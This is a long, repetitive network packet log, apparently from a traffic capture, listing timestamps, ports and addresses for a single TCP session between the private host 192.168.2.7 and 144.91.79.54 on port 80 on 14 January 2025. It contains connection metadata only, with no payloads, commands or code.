Jan 14, 2025 08:47:12.859518051 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.859527111 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.859551907 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.859586000 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.859618902 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.859632969 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.859652996 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.859666109 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.859687090 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.859724045 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.859730959 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.859755993 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.859790087 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.859819889 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.859822989 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.859857082 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.859884024 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.859891891 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.859930038 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.859955072 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.859963894 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.859997034 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860032082 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860045910 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.860065937 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860095024 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.860099077 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860131025 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860145092 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.860166073 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860200882 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860214949 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.860234022 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860270977 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860285997 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.860373020 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860407114 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860420942 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.860440969 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860476971 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860495090 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.860511065 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860543966 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860559940 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.860579014 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860611916 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860639095 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.860646963 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860682964 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860696077 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.860717058 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860750914 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860768080 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.860785007 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860821009 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.860833883 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.865128040 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865161896 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865183115 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.865216017 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865252972 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865305901 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.865307093 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865340948 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865375042 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865397930 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.865407944 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865411043 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.865442038 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865477085 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865509987 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865519047 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.865544081 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865561008 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.865577936 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865629911 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865643978 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.865664959 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865695000 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865701914 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.865729094 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865771055 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.865792036 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865828991 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865864038 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865875959 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.865906000 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865952969 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.865957022 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.865988970 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866036892 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.866043091 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866075993 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866110086 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866130114 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.866142988 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866178989 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866189957 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.866211891 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866245985 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866259098 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.866280079 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866314888 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866329908 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.866348982 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866401911 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866415024 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.866435051 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866472960 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866489887 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.866503000 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866535902 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866545916 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.866570950 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866600037 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.866617918 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.921165943 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.944449902 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944468021 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944484949 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944499969 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944523096 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.944540977 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944566965 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944585085 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944592953 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.944600105 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944616079 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.944622993 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944645882 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.944647074 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944664955 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944679976 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944696903 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944710016 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.944713116 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944730043 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944741011 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.944745064 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944760084 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.944761992 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944789886 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944792032 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.944807053 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944823980 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944830894 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.944839954 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.944889069 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.950342894 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950360060 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950375080 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950392008 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950392008 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.950417995 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.950417995 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950433969 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950450897 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950463057 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.950479031 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950503111 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950517893 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950530052 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.950532913 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950550079 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950557947 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.950566053 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950582027 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.950591087 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950602055 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.950608015 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950623035 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950649023 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.950651884 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950668097 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950690031 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950706959 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950711012 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.950722933 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950736046 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.950738907 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950766087 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.950783014 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950799942 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950815916 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950831890 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950846910 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950855017 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.950881004 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.950926065 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950941086 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950963974 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950978994 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.950990915 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.950994968 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951011896 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951020956 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951028109 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951044083 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951056004 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951071978 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951078892 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951100111 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951117039 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951132059 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951148987 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951164007 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951179028 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951189041 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951200008 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951268911 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951293945 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951309919 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951334000 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951349020 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951353073 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951364040 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951376915 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951380014 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951395988 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951411963 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951412916 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951432943 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951437950 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951448917 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951464891 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951477051 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951504946 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951658010 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951688051 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951704025 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951719046 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951736927 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951749086 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951751947 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951764107 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951769114 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951786041 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951797962 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951802015 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951817989 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951836109 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951843023 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951852083 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951865911 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951869011 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951884985 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951894999 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951903105 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951917887 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951926947 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951945066 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951955080 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.951961994 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951981068 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.951997042 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952008963 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.952044964 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.952079058 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952094078 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952109098 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952125072 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952141047 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952157021 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.952168941 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.952172041 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952194929 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952210903 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952228069 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952241898 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.952244043 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952260971 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952261925 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.952277899 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952285051 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.952294111 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952321053 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.952336073 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952352047 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952370882 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952399969 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952414989 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.952419043 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952433109 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952450991 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952466965 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952481031 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.952483892 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952498913 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.952502012 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:12.952522039 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:12.999303102 CET | 49700 | 80 | 192.168.2.7 | 144.91.79.54
Jan 14, 2025 08:47:13.031260014 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:13.031281948 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
Jan 14, 2025 08:47:13.031301975 CET | 80 | 49700 | 144.91.79.54 | 192.168.2.7
